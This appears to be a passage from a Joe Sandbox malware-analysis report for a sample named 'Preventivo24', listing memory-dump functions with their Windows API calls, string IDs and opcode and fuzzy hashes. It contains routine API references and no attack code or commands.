                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: ExclusiveLock$AcquireRelease$AddressConditionDirectoryMessageProcSendSystemVariableWake
                                                                              • String ID: SetWindowTheme$UxTheme.dll$explorer
                                                                              • API String ID: 1065053019-3123591815
                                                                              • Opcode ID: 7d559e0c51ff8651bf73faa3598eb3961fd3ba882b1e572e2e353b1ded305517
                                                                              • Instruction ID: a5b1b2163302565d7154ccf3c965e9707e03eaabd9518780c8295fb0610c1654
                                                                              • Opcode Fuzzy Hash: 7d559e0c51ff8651bf73faa3598eb3961fd3ba882b1e572e2e353b1ded305517
                                                                              • Instruction Fuzzy Hash: 8D21F2B1A46600EBDB38DF28E805B89B7B6F710B21F110339E97167A84D7B56840DB55
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetProcessHeap.KERNEL32(?,00000000,?,00000000,B5580983), ref: 00EA5EB6
                                                                              • HeapFree.KERNEL32(00000000,?,00000000,?,00000000,B5580983), ref: 00EA5EBC
                                                                              • GetProcessHeap.KERNEL32(?,00000000), ref: 00EA6055
                                                                              • HeapFree.KERNEL32(00000000,?,00000000), ref: 00EA605B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$FreeProcess
                                                                              • String ID: #
                                                                              • API String ID: 3859560861-1885708031
                                                                              • Opcode ID: 66a10ad0e31c269caef944e5ba736f5595514704a6ced2b569766ec4f1c10b10
                                                                              • Instruction ID: 2eaf89841f4293844246efb4ab3e010de6270772317f53c60a2f5f9d0b7cc052
                                                                              • Opcode Fuzzy Hash: 66a10ad0e31c269caef944e5ba736f5595514704a6ced2b569766ec4f1c10b10
                                                                              • Instruction Fuzzy Hash: C6D15571E01209CFDB14CFA8C9947EEBBF0EF5A318F2441AAD8157B291D7756A05CBA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • EnterCriticalSection.KERNEL32(011D001C,B5580983,?,?,?,?,?,?,?,?,?,?,?,?,00000000,010B6085), ref: 00E9ECEA
                                                                              • GetModuleFileNameW.KERNEL32(0000FFFF,00000104,?,?,?,?,?,?,?,?,?,?,?,?,00000000,010B6085), ref: 00E9ED64
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalEnterFileModuleNameSection
                                                                              • String ID:
                                                                              • API String ID: 764724386-0
                                                                              • Opcode ID: b6f667bc287cf11a444b09eb2b2bb6144f6baa2b5ec68dbb3747c7c1b3f56169
                                                                              • Instruction ID: 72a06b8b34aa9d59b03ce4c1776e16ecb3fa904fd4213370e9e6408aeeae87bb
                                                                              • Opcode Fuzzy Hash: b6f667bc287cf11a444b09eb2b2bb6144f6baa2b5ec68dbb3747c7c1b3f56169
                                                                              • Instruction Fuzzy Hash: 44C19D70A04259DFDF25CF68C884BAEBBB9BB08308F144069E915F7391CB75AD45CBA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: ItemMessageSendWindow
                                                                              • String ID:
                                                                              • API String ID: 799199299-0
                                                                              • Opcode ID: 6ef7f8be5107d0301e868ff2137811d3171fe34b97abf1a39ae505e805dabf93
                                                                              • Instruction ID: 0b6b605a7344ed5dd60b8f7bfcd0624f3d091b14db24b5bdbe9d68808ad842c7
                                                                              • Opcode Fuzzy Hash: 6ef7f8be5107d0301e868ff2137811d3171fe34b97abf1a39ae505e805dabf93
                                                                              • Instruction Fuzzy Hash: 3241E232205201AFCB18CF1DE894E76B7A9FB85351F14452EE44AD76A2CB22EC50DB20
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00FB6C84
                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00FB6CA6
                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00FB6CCE
                                                                              • std::_Facet_Register.LIBCPMT ref: 00FB6DB7
                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00FB6DEB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                              • String ID:
                                                                              • API String ID: 459529453-0
                                                                              • Opcode ID: b2cd733c29c72512afe820f21288ab8edf97a21a526673e508f22daf1c97cf5c
                                                                              • Instruction ID: a2781939a4c827813965c37f5051f6bee27fa931d4e1a85d6eab6988a008348e
                                                                              • Opcode Fuzzy Hash: b2cd733c29c72512afe820f21288ab8edf97a21a526673e508f22daf1c97cf5c
                                                                              • Instruction Fuzzy Hash: B851DF70A05249CFDB15DF58C980BEEBBB0FF10324F24806AD855AB380DB79AA05DF90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • LocalFree.KERNEL32(?,?,?), ref: 00FB9C22
                                                                              • LocalFree.KERNEL32(?,?,?), ref: 00FB9C36
                                                                              • GetLastError.KERNEL32 ref: 00FB9C78
                                                                              • LocalAlloc.KERNEL32(00000040,00000014), ref: 00FB9CB8
                                                                              • GetLastError.KERNEL32 ref: 00FB9CD2
                                                                              • LocalFree.KERNEL32(?), ref: 00FB9CE3
                                                                                • Part of subcall function 00E8B070: RtlAllocateHeap.NTDLL(?,00000000,?,B5580983,00000000,010B1B00,000000FF,?,?,011C5D3C,?,?,01003AC7,80004005,B5580983,?), ref: 00E8B0BA
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: Local$Free$ErrorLast$AllocAllocateHeap
                                                                              • String ID:
                                                                              • API String ID: 1027944315-0
                                                                              • Opcode ID: 466e58d166a50ca2d3fe1e51e81dfaf51735b2395296944286d7ca018dcbe8d5
                                                                              • Instruction ID: 310d023a7543a19677cab61f66b747dd9e703f8da3248909f2f111caf81a316f
                                                                              • Opcode Fuzzy Hash: 466e58d166a50ca2d3fe1e51e81dfaf51735b2395296944286d7ca018dcbe8d5
                                                                              • Instruction Fuzzy Hash: 05314BB1A087029FD7309F6AD948B97BBE8BF44711F00892DFA96D2640E7B4E448DF51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • CreateFileW.KERNEL32(00FFE190,80000000,00000000,00000000,00000003,00000080,00000000,B5580983,?,00FFE190), ref: 00FFE1CC
                                                                              • GetLastError.KERNEL32 ref: 00FFE1EA
                                                                              • ReadFile.KERNEL32(00000000,B5580983,00000004,00FFE190,00000000), ref: 00FFE200
                                                                              • GetLastError.KERNEL32 ref: 00FFE20A
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00FFE229
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorFileLast$CloseCreateHandleRead
                                                                              • String ID:
                                                                              • API String ID: 3160720760-0
                                                                              • Opcode ID: bded0dbc595cee216e46bb197aefe97a6364923fa763a7b3deaa676adae8bd03
                                                                              • Instruction ID: 19f1f0c39bd3ab7868d5899d9b09a680227877b8642ed97a90c9d1e6cd6b28a5
                                                                              • Opcode Fuzzy Hash: bded0dbc595cee216e46bb197aefe97a6364923fa763a7b3deaa676adae8bd03
                                                                              • Instruction Fuzzy Hash: A8119072A40209AFD734CF54DE05BAABBB8EB05B20F200269FA21F63D0E77459409B91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E9270A
                                                                              • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00E92710
                                                                              • FormatMessageW.KERNEL32(00001300,00000000,?,00000400,00000000,00000000,00000000), ref: 00E92733
                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,010B3BA6,000000FF), ref: 00E9275B
                                                                              • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,010B3BA6,000000FF), ref: 00E92761
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$FreeProcess$FormatMessage
                                                                              • String ID:
                                                                              • API String ID: 1606019998-0
                                                                              • Opcode ID: 81b9724d128e3feac9cef16c8486448aeef152b6afd15ad8b6eca68952168c40
                                                                              • Instruction ID: 30df666804e203a94d126f52d0708a260b04dd73b1b7e7f25f17fcba184488ad
                                                                              • Opcode Fuzzy Hash: 81b9724d128e3feac9cef16c8486448aeef152b6afd15ad8b6eca68952168c40
                                                                              • Instruction Fuzzy Hash: 6C1130B1A44219ABEF10EF94CC45BEFBBB8EB04B14F100519F510BB2C0DBB599048B91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00EAE1BA
                                                                              • SendMessageW.USER32(?,?,?,0000102B), ref: 00EAE211
                                                                              • SendMessageW.USER32(?,?,?,0000102B), ref: 00EAE264
                                                                              • SendMessageW.USER32(?,00001043,00000000,00000000), ref: 00EAE279
                                                                              • SendMessageW.USER32(?,00001013,00000000,00000000), ref: 00EAE28A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$LongWindow
                                                                              • String ID:
                                                                              • API String ID: 312131281-0
                                                                              • Opcode ID: 04c00c19f9c7a643292c509a81d9322625d9228eb6332cee5733dc9c43d766ea
                                                                              • Instruction ID: 815543d1d212d6178cf2f0c0e4e3f5f8d21327cc8859a66915cc0b387977e63f
                                                                              • Opcode Fuzzy Hash: 04c00c19f9c7a643292c509a81d9322625d9228eb6332cee5733dc9c43d766ea
                                                                              • Instruction Fuzzy Hash: 07214D31859786ABE320CF40CD45B1ABBF5BFDE718F206B1EF19421198E7B19584CB86
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • CreateWindowExW.USER32(?,RichEdit20W,?,?,00000000,80000000,00000000,00000000,00000000,00000000,00000000), ref: 00EBAA1B
                                                                              • SendMessageW.USER32(00000000,00000031,00000000,00000000), ref: 00EBAA2A
                                                                              • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 00EBAA36
                                                                                • Part of subcall function 00E8B070: RtlAllocateHeap.NTDLL(?,00000000,?,B5580983,00000000,010B1B00,000000FF,?,?,011C5D3C,?,?,01003AC7,80004005,B5580983,?), ref: 00E8B0BA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$AllocateCreateHeapWindow
                                                                              • String ID: RichEdit20W
                                                                              • API String ID: 2359350451-4173859555
                                                                              • Opcode ID: bc950e1b6cc6dfaf5cc588f3456c48d1dd29d13f29d7593cb85e572873b3aa18
                                                                              • Instruction ID: 73bd38ed24d952be8bd2a631afec6f4681bece202e1c8c92bd75cd411bada5f0
                                                                              • Opcode Fuzzy Hash: bc950e1b6cc6dfaf5cc588f3456c48d1dd29d13f29d7593cb85e572873b3aa18
                                                                              • Instruction Fuzzy Hash: 09C17631A002289FDB18DFA8C895BEEBBB5EB48314F14416AE915B7390DB75A801CB94
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                                • Part of subcall function 00E8B070: RtlAllocateHeap.NTDLL(?,00000000,?,B5580983,00000000,010B1B00,000000FF,?,?,011C5D3C,?,?,01003AC7,80004005,B5580983,?), ref: 00E8B0BA
                                                                                • Part of subcall function 00F990D0: SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000037,?,?,?,00000000,?,00EAD728,?,80004005,?), ref: 00F99157
                                                                                • Part of subcall function 00F990D0: SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00F99191
                                                                              • SendMessageW.USER32(?,00001036,00000004,00000004), ref: 00EB4DA1
                                                                              • SendMessageW.USER32(?,00001036,00000400,00000400), ref: 00EB4DBC
                                                                              • SendMessageW.USER32(?,00001061,00000000,?), ref: 00EB4E1C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$AllocateHeapWindow
                                                                              • String ID: QuickSelectionList
                                                                              • API String ID: 3168177373-3633591268
                                                                              • Opcode ID: 98bb1aaae1c652a5afba5f12cfa7b7f61801192066ea4c214e707525f1960d67
                                                                              • Instruction ID: 5e84a4202d244e10fb5c451976bd19fb81d85f20fa4277a228d4b0d0a95607fb
                                                                              • Opcode Fuzzy Hash: 98bb1aaae1c652a5afba5f12cfa7b7f61801192066ea4c214e707525f1960d67
                                                                              • Instruction Fuzzy Hash: 4D81BC71A002099FDB14DF64C884BAEBBF5FF88324F04052AF925A7381DB34A944CF90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,B5580983,?,80000002,80000002), ref: 00FF79C3
                                                                              • CloseHandle.KERNEL32(?,B5580983,80000002,?,00000000,01100E53,000000FF,?,80004005,?,80000002), ref: 00FF7B60
                                                                              • CloseHandle.KERNEL32(00000000,B5580983,80000002,?,00000000,01100E53,000000FF,?,80004005,?,80000002), ref: 00FF7B8F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: CloseHandle$FileModuleName
                                                                              • String ID: LOG
                                                                              • API String ID: 3884789274-429402703
                                                                              • Opcode ID: d11fe4a326ddbc339824b1be3195b1238d7399b287987c8d0b7dabe2e3f30a10
                                                                              • Instruction ID: d7bf53fffd7fd583ac239d3f42b56d6482e5230456cd906f521c43f235ac0322
                                                                              • Opcode Fuzzy Hash: d11fe4a326ddbc339824b1be3195b1238d7399b287987c8d0b7dabe2e3f30a10
                                                                              • Instruction Fuzzy Hash: 3361C371A04348DFDB24EF28C8447AEB7F5FF44710F154669E91ADB7A0E7B49A048B90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,B5580983), ref: 01008937
                                                                                • Part of subcall function 00FA4450: MultiByteToWideChar.KERNEL32(00000003,00000000,80000004,000000FF,00000000,00000000,00000000,?,011D0080,00FF7258,?), ref: 00FA4468
